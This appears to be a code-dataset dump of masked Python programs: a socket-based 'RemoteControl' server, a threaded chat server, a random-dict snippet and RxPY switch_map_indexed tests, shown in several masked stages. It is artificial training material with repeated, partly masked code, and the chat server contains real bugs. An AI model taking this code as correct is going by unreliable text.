如果文件无法打开,将处罚IOError异常。\n应该使用open()来代替直接使用file类型的构造函数打开文件。\n参数filename表示将要被打开的文件的路径字符串;\n参数mode表示打开的模式,最常用的模式有:'r'表示读文本,'w'表示写文本文件,'a'表示在文件中追加。\nMode的默认值是'r'。\n当操作的是二进制文件时,只要在模式值上添加'b'。这样提高了程序的可移植性。\n可选参数bufsize定义了文件缓冲区的大小。0表示不缓冲;1表示行缓冲;任何其他正数表示使用该大小的缓冲区;\n负数表示使用系统默认缓冲区大小,对于tty设备它往往是行缓冲,而对于其他文件往往完全缓冲。如果参数值被省却。\n使用系统默认值。\n'''\n\nf=open('1.txt','r',encoding='utf-8')\nprint(f.read())\n'''\n输出...\nltf\nzhongguo\nshanxi\nyuncheng\n男\n20\n'''\n\n#参考博客 https://www.cnblogs.com/Devilf/p/8006663.html\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class MachineClient:
def __init__(self, host, port):
self.host = host
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.db = DataBase(
'C:\\Users\\user\\Documents\\RemoteControl\\Server\\pythonsqlite.db'
)
self.data = ''
self.clients = Clients()
self.remote_client = []
def connection_check(self):
connection_check = ConnectionCheck(self.s, self.clients)
if connection_check.check_database_update():
return
while True:
time.sleep(2)
connection_check.connect_db()
self.clients = connection_check.start()
<|reserved_special_token_0|>
def accept(self):
while True:
a = Accept(self.s, self.clients, self.host)
a.accept()
self.clients = a.clients
def start(self):
self.s.bind((self.host, self.port))
self.s.listen(5)
accept = threading.Thread(target=self.accept)
accept.start()
conn_check = threading.Thread(target=self.connection_check)
conn_check.start()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MachineClient:
def __init__(self, host, port):
self.host = host
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.db = DataBase(
'C:\\Users\\user\\Documents\\RemoteControl\\Server\\pythonsqlite.db'
)
self.data = ''
self.clients = Clients()
self.remote_client = []
def connection_check(self):
connection_check = ConnectionCheck(self.s, self.clients)
if connection_check.check_database_update():
return
while True:
time.sleep(2)
connection_check.connect_db()
self.clients = connection_check.start()
def connection(self):
while True:
for c in self.clients.data:
if c[1] is not None:
print('connection')
self.s.settimeout(0.5)
try:
print(c[0].recv(10000).decode())
except socket.timeout:
pass
def accept(self):
while True:
a = Accept(self.s, self.clients, self.host)
a.accept()
self.clients = a.clients
def start(self):
self.s.bind((self.host, self.port))
self.s.listen(5)
accept = threading.Thread(target=self.accept)
accept.start()
conn_check = threading.Thread(target=self.connection_check)
conn_check.start()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MachineClient:
def __init__(self, host, port):
self.host = host
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.db = DataBase(
'C:\\Users\\user\\Documents\\RemoteControl\\Server\\pythonsqlite.db'
)
self.data = ''
self.clients = Clients()
self.remote_client = []
def connection_check(self):
connection_check = ConnectionCheck(self.s, self.clients)
if connection_check.check_database_update():
return
while True:
time.sleep(2)
connection_check.connect_db()
self.clients = connection_check.start()
def connection(self):
while True:
for c in self.clients.data:
if c[1] is not None:
print('connection')
self.s.settimeout(0.5)
try:
print(c[0].recv(10000).decode())
except socket.timeout:
pass
def accept(self):
while True:
a = Accept(self.s, self.clients, self.host)
a.accept()
self.clients = a.clients
def start(self):
self.s.bind((self.host, self.port))
self.s.listen(5)
accept = threading.Thread(target=self.accept)
accept.start()
conn_check = threading.Thread(target=self.connection_check)
conn_check.start()
if __name__ == '__main__':
server = MachineClient('localhost', 8080)
server.start()
<|reserved_special_token_1|>
import socket
from Server.MachineClient.Identification import Identification
from Server.SQL import DataBase
import threading
import time
from Server.Connection.AcceptClients import Accept
from Server.Connection.ConnectionCheck import ConnectionCheck
from Server.Clients_Data import Clients
class MachineClient:
def __init__(self, host, port):
self.host = host
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.db = DataBase(
'C:\\Users\\user\\Documents\\RemoteControl\\Server\\pythonsqlite.db'
)
self.data = ''
self.clients = Clients()
self.remote_client = []
def connection_check(self):
connection_check = ConnectionCheck(self.s, self.clients)
if connection_check.check_database_update():
return
while True:
time.sleep(2)
connection_check.connect_db()
self.clients = connection_check.start()
def connection(self):
while True:
for c in self.clients.data:
if c[1] is not None:
print('connection')
self.s.settimeout(0.5)
try:
print(c[0].recv(10000).decode())
except socket.timeout:
pass
def accept(self):
while True:
a = Accept(self.s, self.clients, self.host)
a.accept()
self.clients = a.clients
def start(self):
self.s.bind((self.host, self.port))
self.s.listen(5)
accept = threading.Thread(target=self.accept)
accept.start()
conn_check = threading.Thread(target=self.connection_check)
conn_check.start()
if __name__ == '__main__':
server = MachineClient('localhost', 8080)
server.start()
<|reserved_special_token_1|>
import socket
from Server.MachineClient.Identification import Identification
from Server.SQL import DataBase
import threading
import time
from Server.Connection.AcceptClients import Accept
from Server.Connection.ConnectionCheck import ConnectionCheck
from Server.Clients_Data import Clients
class MachineClient:
def __init__(self, host, port):
self.host = host
self.port = port
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.db = DataBase(r"C:\Users\user\Documents\RemoteControl\Server\pythonsqlite.db")
self.data = ""
self.clients = Clients()
self.remote_client = []
def connection_check(self):
connection_check = ConnectionCheck(self.s, self.clients)
if connection_check.check_database_update():
return
while True:
time.sleep(2)
connection_check.connect_db()
self.clients = connection_check.start()
def connection(self):
while True:
for c in self.clients.data:
if c[1] is not None:
print("connection")
self.s.settimeout(0.5)
try:
print(c[0].recv(10000).decode())
except socket.timeout:
pass
# c[1].send()
def accept(self):
while True:
a = Accept(self.s, self.clients, self.host)
a.accept()
self.clients = a.clients
def start(self):
self.s.bind((self.host, self.port))
self.s.listen(5)
accept = threading.Thread(target=self.accept)
accept.start()
conn_check = threading.Thread(target=self.connection_check)
conn_check.start()
# connection = threading.Thread(target=self.connection)
# connection.start()
if __name__ == "__main__":
server = MachineClient("localhost", 8080)
server.start()
|
flexible
|
{
"blob_id": "ff1bb2634ffec6181a42c80a4b2a19c2c27a8f9f",
"index": 3136,
"step-1": "<mask token>\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n <mask token>\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print('connection')\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print('connection')\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\nif __name__ == '__main__':\n server = MachineClient('localhost', 8080)\n server.start()\n",
"step-4": "import socket\nfrom Server.MachineClient.Identification import Identification\nfrom Server.SQL import DataBase\nimport threading\nimport time\nfrom Server.Connection.AcceptClients import Accept\nfrom Server.Connection.ConnectionCheck import ConnectionCheck\nfrom Server.Clients_Data import Clients\n\n\nclass MachineClient:\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(\n 'C:\\\\Users\\\\user\\\\Documents\\\\RemoteControl\\\\Server\\\\pythonsqlite.db'\n )\n self.data = ''\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print('connection')\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n accept = threading.Thread(target=self.accept)\n accept.start()\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n\nif __name__ == '__main__':\n server = MachineClient('localhost', 8080)\n server.start()\n",
"step-5": "import socket\nfrom Server.MachineClient.Identification import Identification\nfrom Server.SQL import DataBase\nimport threading\nimport time\nfrom Server.Connection.AcceptClients import Accept\nfrom Server.Connection.ConnectionCheck import ConnectionCheck\nfrom Server.Clients_Data import Clients\n\n\nclass MachineClient:\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.db = DataBase(r\"C:\\Users\\user\\Documents\\RemoteControl\\Server\\pythonsqlite.db\")\n self.data = \"\"\n self.clients = Clients()\n self.remote_client = []\n\n def connection_check(self):\n connection_check = ConnectionCheck(self.s, self.clients)\n if connection_check.check_database_update():\n return\n while True:\n time.sleep(2)\n connection_check.connect_db()\n self.clients = connection_check.start()\n\n def connection(self):\n while True:\n for c in self.clients.data:\n if c[1] is not None:\n print(\"connection\")\n self.s.settimeout(0.5)\n try:\n print(c[0].recv(10000).decode())\n except socket.timeout:\n pass\n # c[1].send()\n\n def accept(self):\n while True:\n a = Accept(self.s, self.clients, self.host)\n a.accept()\n self.clients = a.clients\n\n def start(self):\n self.s.bind((self.host, self.port))\n self.s.listen(5)\n\n accept = threading.Thread(target=self.accept)\n accept.start()\n\n conn_check = threading.Thread(target=self.connection_check)\n conn_check.start()\n\n # connection = threading.Thread(target=self.connection)\n # connection.start()\n\n\nif __name__ == \"__main__\":\n server = MachineClient(\"localhost\", 8080)\n server.start()\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except:
index = client.index(client)
clients.remove(client)
client.close()
name = client_names[index]
broadcast(f'{client_name} left the chat!'.encode('ascii'))
client_names.remove(name)
break
def recieve():
while True:
client, address = server.accept()
print(f'Connected with {str(address)}!')
client.send('YO'.encode('ascii'))
name = client.recv(1024).decode('ascii')
client_names.append(name)
client_names.append(client)
print(f'Name of the client is {name}')
broadcast(f'{name} joined the chat!'.encode('ascii'))
client.send("Connected to the Noob Coder's Server!".encode('ascii'))
thread = threading.Thread(target=handle, args=(client,))
thread.start()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
server.bind(('', port))
server.listen()
<|reserved_special_token_0|>
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except:
index = client.index(client)
clients.remove(client)
client.close()
name = client_names[index]
broadcast(f'{client_name} left the chat!'.encode('ascii'))
client_names.remove(name)
break
def recieve():
while True:
client, address = server.accept()
print(f'Connected with {str(address)}!')
client.send('YO'.encode('ascii'))
name = client.recv(1024).decode('ascii')
client_names.append(name)
client_names.append(client)
print(f'Name of the client is {name}')
broadcast(f'{name} joined the chat!'.encode('ascii'))
client.send("Connected to the Noob Coder's Server!".encode('ascii'))
thread = threading.Thread(target=handle, args=(client,))
thread.start()
print('SERVER STARTED...')
recieve()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 12321
server.bind(('', port))
server.listen()
client_names = []
clients = []
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except:
index = client.index(client)
clients.remove(client)
client.close()
name = client_names[index]
broadcast(f'{client_name} left the chat!'.encode('ascii'))
client_names.remove(name)
break
def recieve():
while True:
client, address = server.accept()
print(f'Connected with {str(address)}!')
client.send('YO'.encode('ascii'))
name = client.recv(1024).decode('ascii')
client_names.append(name)
client_names.append(client)
print(f'Name of the client is {name}')
broadcast(f'{name} joined the chat!'.encode('ascii'))
client.send("Connected to the Noob Coder's Server!".encode('ascii'))
thread = threading.Thread(target=handle, args=(client,))
thread.start()
print('SERVER STARTED...')
recieve()
<|reserved_special_token_1|>
import socket
import threading
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 12321
server.bind(('', port))
server.listen()
client_names = []
clients = []
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except:
index = client.index(client)
clients.remove(client)
client.close()
name = client_names[index]
broadcast(f'{client_name} left the chat!'.encode('ascii'))
client_names.remove(name)
break
def recieve():
while True:
client, address = server.accept()
print(f'Connected with {str(address)}!')
client.send('YO'.encode('ascii'))
name = client.recv(1024).decode('ascii')
client_names.append(name)
client_names.append(client)
print(f'Name of the client is {name}')
broadcast(f'{name} joined the chat!'.encode('ascii'))
client.send("Connected to the Noob Coder's Server!".encode('ascii'))
thread = threading.Thread(target=handle, args=(client,))
thread.start()
print('SERVER STARTED...')
recieve()
<|reserved_special_token_1|>
import socket
import threading
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 12321
server.bind(('', port))
server.listen()
client_names = []
clients = []
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except:
index = client.index(client)
clients.remove(client)
client.close()
name = client_names[index]
broadcast(f"{client_name} left the chat!".encode('ascii'))
client_names.remove(name)
break
def recieve():
while True:
client, address = server.accept()
print(f"Connected with {str(address)}!")
client.send('YO'.encode('ascii'))
name = client.recv(1024).decode('ascii')
client_names.append(name)
client_names.append(client)
print(f"Name of the client is {name}")
broadcast(f"{name} joined the chat!".encode("ascii"))
client.send("Connected to the Noob Coder's Server!".encode("ascii"))
thread = threading.Thread(target=handle, args=(client,))
thread.start()
print("SERVER STARTED...")
recieve()
|
flexible
|
{
"blob_id": "f1fbbbe4258d0fb0a43505f4718730934fd595ec",
"index": 1831,
"step-1": "<mask token>\n\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024)\n broadcast(message)\n except:\n index = client.index(client)\n clients.remove(client)\n client.close()\n name = client_names[index]\n broadcast(f'{client_name} left the chat!'.encode('ascii'))\n client_names.remove(name)\n break\n\n\ndef recieve():\n while True:\n client, address = server.accept()\n print(f'Connected with {str(address)}!')\n client.send('YO'.encode('ascii'))\n name = client.recv(1024).decode('ascii')\n client_names.append(name)\n client_names.append(client)\n print(f'Name of the client is {name}')\n broadcast(f'{name} joined the chat!'.encode('ascii'))\n client.send(\"Connected to the Noob Coder's Server!\".encode('ascii'))\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\n\n<mask token>\n",
"step-2": "<mask token>\nserver.bind(('', port))\nserver.listen()\n<mask token>\n\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024)\n broadcast(message)\n except:\n index = client.index(client)\n clients.remove(client)\n client.close()\n name = client_names[index]\n broadcast(f'{client_name} left the chat!'.encode('ascii'))\n client_names.remove(name)\n break\n\n\ndef recieve():\n while True:\n client, address = server.accept()\n print(f'Connected with {str(address)}!')\n client.send('YO'.encode('ascii'))\n name = client.recv(1024).decode('ascii')\n client_names.append(name)\n client_names.append(client)\n print(f'Name of the client is {name}')\n broadcast(f'{name} joined the chat!'.encode('ascii'))\n client.send(\"Connected to the Noob Coder's Server!\".encode('ascii'))\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\n\nprint('SERVER STARTED...')\nrecieve()\n",
"step-3": "<mask token>\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nport = 12321\nserver.bind(('', port))\nserver.listen()\nclient_names = []\nclients = []\n\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024)\n broadcast(message)\n except:\n index = client.index(client)\n clients.remove(client)\n client.close()\n name = client_names[index]\n broadcast(f'{client_name} left the chat!'.encode('ascii'))\n client_names.remove(name)\n break\n\n\ndef recieve():\n while True:\n client, address = server.accept()\n print(f'Connected with {str(address)}!')\n client.send('YO'.encode('ascii'))\n name = client.recv(1024).decode('ascii')\n client_names.append(name)\n client_names.append(client)\n print(f'Name of the client is {name}')\n broadcast(f'{name} joined the chat!'.encode('ascii'))\n client.send(\"Connected to the Noob Coder's Server!\".encode('ascii'))\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\n\nprint('SERVER STARTED...')\nrecieve()\n",
"step-4": "import socket\nimport threading\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nport = 12321\nserver.bind(('', port))\nserver.listen()\nclient_names = []\nclients = []\n\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024)\n broadcast(message)\n except:\n index = client.index(client)\n clients.remove(client)\n client.close()\n name = client_names[index]\n broadcast(f'{client_name} left the chat!'.encode('ascii'))\n client_names.remove(name)\n break\n\n\ndef recieve():\n while True:\n client, address = server.accept()\n print(f'Connected with {str(address)}!')\n client.send('YO'.encode('ascii'))\n name = client.recv(1024).decode('ascii')\n client_names.append(name)\n client_names.append(client)\n print(f'Name of the client is {name}')\n broadcast(f'{name} joined the chat!'.encode('ascii'))\n client.send(\"Connected to the Noob Coder's Server!\".encode('ascii'))\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\n\nprint('SERVER STARTED...')\nrecieve()\n",
"step-5": "import socket\nimport threading\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nport = 12321\n\nserver.bind(('', port))\nserver.listen()\n\nclient_names = []\nclients = []\n\ndef broadcast(message):\n for client in clients:\n client.send(message)\n\n\ndef handle(client):\n while True:\n try:\n message = client.recv(1024)\n broadcast(message)\n except:\n index = client.index(client)\n clients.remove(client)\n client.close()\n name = client_names[index]\n broadcast(f\"{client_name} left the chat!\".encode('ascii'))\n client_names.remove(name)\n break\n\n\ndef recieve():\n while True:\n client, address = server.accept()\n print(f\"Connected with {str(address)}!\")\n \n client.send('YO'.encode('ascii'))\n name = client.recv(1024).decode('ascii')\n client_names.append(name)\n client_names.append(client)\n\n print(f\"Name of the client is {name}\")\n broadcast(f\"{name} joined the chat!\".encode(\"ascii\"))\n client.send(\"Connected to the Noob Coder's Server!\".encode(\"ascii\"))\n\n thread = threading.Thread(target=handle, args=(client,))\n thread.start()\n\nprint(\"SERVER STARTED...\")\nrecieve()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while t:
a = random.randint(1, 10)
if a not in s:
t = False
<|reserved_special_token_0|>
print(s)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
s = {(1): 1, (2): 2, (3): 3, (4): 4, (5): 5}
t = True
while t:
a = random.randint(1, 10)
if a not in s:
t = False
s[a] = a
print(s)
<|reserved_special_token_1|>
import random
s = {(1): 1, (2): 2, (3): 3, (4): 4, (5): 5}
t = True
while t:
a = random.randint(1, 10)
if a not in s:
t = False
s[a] = a
print(s)
<|reserved_special_token_1|>
import random
s = {1: 1, 2: 2, 3: 3, 4: 4, 5: 5}
t = True
while t:
a = random.randint(1, 10)
if a not in s:
t = False
s[a] = a
print(s)
|
flexible
|
{
"blob_id": "b9b113bdc5d06b8a7235333d3b3315b98a450e51",
"index": 6562,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile t:\n a = random.randint(1, 10)\n if a not in s:\n t = False\n<mask token>\nprint(s)\n",
"step-3": "<mask token>\ns = {(1): 1, (2): 2, (3): 3, (4): 4, (5): 5}\nt = True\nwhile t:\n a = random.randint(1, 10)\n if a not in s:\n t = False\ns[a] = a\nprint(s)\n",
"step-4": "import random\ns = {(1): 1, (2): 2, (3): 3, (4): 4, (5): 5}\nt = True\nwhile t:\n a = random.randint(1, 10)\n if a not in s:\n t = False\ns[a] = a\nprint(s)\n",
"step-5": "import random\ns = {1: 1, 2: 2, 3: 3, 4: 4, 5: 5}\nt = True\nwhile t:\n a = random.randint(1, 10)\n if a not in s:\n t = False\ns[a] = a\nprint(s)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import unittest
from reactivex import interval
from reactivex import operators as ops
from reactivex.testing import ReactiveTest, TestScheduler
from reactivex.testing.marbles import marbles_testing
from reactivex.testing.subscription import Subscription
on_next = ReactiveTest.on_next
on_completed = ReactiveTest.on_completed
on_error = ReactiveTest.on_error
subscribe = ReactiveTest.subscribe
subscribed = ReactiveTest.subscribed
disposed = ReactiveTest.disposed
created = ReactiveTest.created
class TestSwitchMapIndex(unittest.TestCase):
def test_switch_map_indexed_uses_index(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_next(300, "a"),
on_next(400, "b"),
on_next(500, "c"),
)
def create_inner(x: str, i: int):
def create_changing(j: int):
return (i, j, x)
return interval(20).pipe(ops.map(create_changing))
def create():
return xs.pipe(ops.switch_map_indexed(project=create_inner))
results = scheduler.start(create, disposed=580)
# (i, j, x): i is the index of the outer emit;
# j is the value of the inner interval;
# x is the value of the outer emission
assert results.messages == [
on_next(320, (0, 0, "a")),
on_next(340, (0, 1, "a")),
on_next(360, (0, 2, "a")),
on_next(380, (0, 3, "a")),
on_next(420, (1, 0, "b")),
on_next(440, (1, 1, "b")),
on_next(460, (1, 2, "b")),
on_next(480, (1, 3, "b")),
on_next(520, (2, 0, "c")),
on_next(540, (2, 1, "c")),
on_next(560, (2, 2, "c")),
]
assert xs.subscriptions == [Subscription(200, 580)]
def test_switch_map_indexed_inner_throws(self):
"""Inner throwing causes outer to throw"""
ex = "ex"
scheduler = TestScheduler()
sources = [
scheduler.create_cold_observable(on_next(100, "a"), on_next(300, "aa")),
scheduler.create_cold_observable(on_next(50, "b"), on_error(120, ex)),
scheduler.create_cold_observable(
on_next(50, "wont happen"), on_error(120, "no")
),
]
xs = scheduler.create_hot_observable(
on_next(
250,
0,
),
on_next(400, 1),
on_next(
550,
2,
),
)
def create_inner(x: int, _i: int):
return sources[x]
def create():
return xs.pipe(ops.switch_map_indexed(create_inner))
results = scheduler.start(create)
assert results.messages == [
on_next(350, "a"),
on_next(450, "b"),
on_error(520, ex),
]
assert sources[0].subscriptions == [Subscription(250, 400)]
assert sources[1].subscriptions == [Subscription(400, 520)]
assert sources[2].subscriptions == []
def test_switch_map_indexed_outer_throws(self):
"""Outer throwing unsubscribes from all"""
ex = "ABC"
scheduler = TestScheduler()
sources = [
scheduler.create_cold_observable(on_next(100, "a"), on_next(300, "aa")),
scheduler.create_cold_observable(on_next(50, "b"), on_error(120, ex)),
scheduler.create_cold_observable(
on_next(50, "wont happen"), on_error(120, "no")
),
]
xs = scheduler.create_hot_observable(
on_next(
250,
0,
),
on_next(400, 1),
on_error(430, ex),
)
def create_inner(x: int, _i: int):
return sources[x]
def create():
return xs.pipe(ops.switch_map_indexed(create_inner))
results = scheduler.start(create)
assert results.messages == [
on_next(350, "a"),
on_error(430, ex),
]
assert sources[0].subscriptions == [Subscription(250, 400)]
assert sources[1].subscriptions == [Subscription(400, 430)]
assert sources[2].subscriptions == []
def test_switch_map_indexed_no_inner(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(on_completed(500))
# Fake inner which should never be subscribed to
sources = [scheduler.create_cold_observable(on_next(20, 2))]
def create_inner(_x: int, i: int):
return sources[i]
def create():
return xs.pipe(ops.switch_map_indexed(create_inner))
results = scheduler.start(create)
assert results.messages == [on_completed(500)]
assert xs.subscriptions == [Subscription(200, 500)]
assert sources[0].subscriptions == []
def test_switch_map_indexed_inner_completes(self):
"""Inner completions do not affect outer"""
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_next(300, "d"),
on_next(330, "f"),
on_completed(540),
)
def create_inner(x: str, i: int):
"""An observable which will complete after 40 ticks"""
return interval(20).pipe(ops.map(lambda j: (i, j, x)), ops.take(2))
def create():
return xs.pipe(ops.switch_map_indexed(create_inner))
results = scheduler.start(create)
assert results.messages == [
on_next(320, (0, 0, "d")),
on_next(350, (1, 0, "f")),
on_next(
370, (1, 1, "f")
), # here the current inner is unsubscribed but not the outer
on_completed(540), # only outer completion affects
]
def test_switch_map_default_mapper(self):
with marbles_testing(timespan=10) as (start, cold, hot, exp):
xs = hot(
" ---a---b------c-----",
{
"a": cold(" --1--2", None, None),
"b": cold(" --1-2-3-4-5|", None, None),
"c": cold(" --1--2", None, None),
},
None,
)
expected = exp(" -----1---1-2-3--1--2", None, None)
result = start(xs.pipe(ops.switch_map_indexed()))
assert result == expected
|
normal
|
{
"blob_id": "03dd37346ed12bbd66cbebc46fadc37be319b986",
"index": 548,
"step-1": "<mask token>\n\n\nclass TestSwitchMapIndex(unittest.TestCase):\n\n def test_switch_map_indexed_uses_index(self):\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'a'), on_next(400,\n 'b'), on_next(500, 'c'))\n\n def create_inner(x: str, i: int):\n\n def create_changing(j: int):\n return i, j, x\n return interval(20).pipe(ops.map(create_changing))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(project=create_inner))\n results = scheduler.start(create, disposed=580)\n assert results.messages == [on_next(320, (0, 0, 'a')), on_next(340,\n (0, 1, 'a')), on_next(360, (0, 2, 'a')), on_next(380, (0, 3,\n 'a')), on_next(420, (1, 0, 'b')), on_next(440, (1, 1, 'b')),\n on_next(460, (1, 2, 'b')), on_next(480, (1, 3, 'b')), on_next(\n 520, (2, 0, 'c')), on_next(540, (2, 1, 'c')), on_next(560, (2, \n 2, 'c'))]\n assert xs.subscriptions == [Subscription(200, 580)]\n\n def test_switch_map_indexed_inner_throws(self):\n \"\"\"Inner throwing causes outer to throw\"\"\"\n ex = 'ex'\n scheduler = TestScheduler()\n sources = [scheduler.create_cold_observable(on_next(100, 'a'),\n on_next(300, 'aa')), scheduler.create_cold_observable(on_next(\n 50, 'b'), on_error(120, ex)), scheduler.create_cold_observable(\n on_next(50, 'wont happen'), on_error(120, 'no'))]\n xs = scheduler.create_hot_observable(on_next(250, 0), on_next(400, \n 1), on_next(550, 2))\n\n def create_inner(x: int, _i: int):\n return sources[x]\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(350, 'a'), on_next(450, 'b'),\n on_error(520, ex)]\n assert sources[0].subscriptions == [Subscription(250, 400)]\n assert sources[1].subscriptions == [Subscription(400, 520)]\n assert sources[2].subscriptions == []\n <mask token>\n <mask token>\n\n def test_switch_map_indexed_inner_completes(self):\n \"\"\"Inner completions do not affect outer\"\"\"\n scheduler = TestScheduler()\n xs = scheduler.create_hot_observable(on_next(300, 'd'), on_next(330,\n 'f'), on_completed(540))\n\n def create_inner(x: str, i: int):\n \"\"\"An observable which will complete after 40 ticks\"\"\"\n return interval(20).pipe(ops.map(lambda j: (i, j, x)), ops.take(2))\n\n def create():\n return xs.pipe(ops.switch_map_indexed(create_inner))\n results = scheduler.start(create)\n assert results.messages == [on_next(320, (0, 0, 'd')), on_next(350,\n (1, 0, 'f')), on_next(370, (1, 1, 'f')), on_completed(540)]\n\n def test_switch_map_default_mapper(self):\n with marbles_testing(timespan=10) as (start, cold, hot, exp):\n xs = hot(' 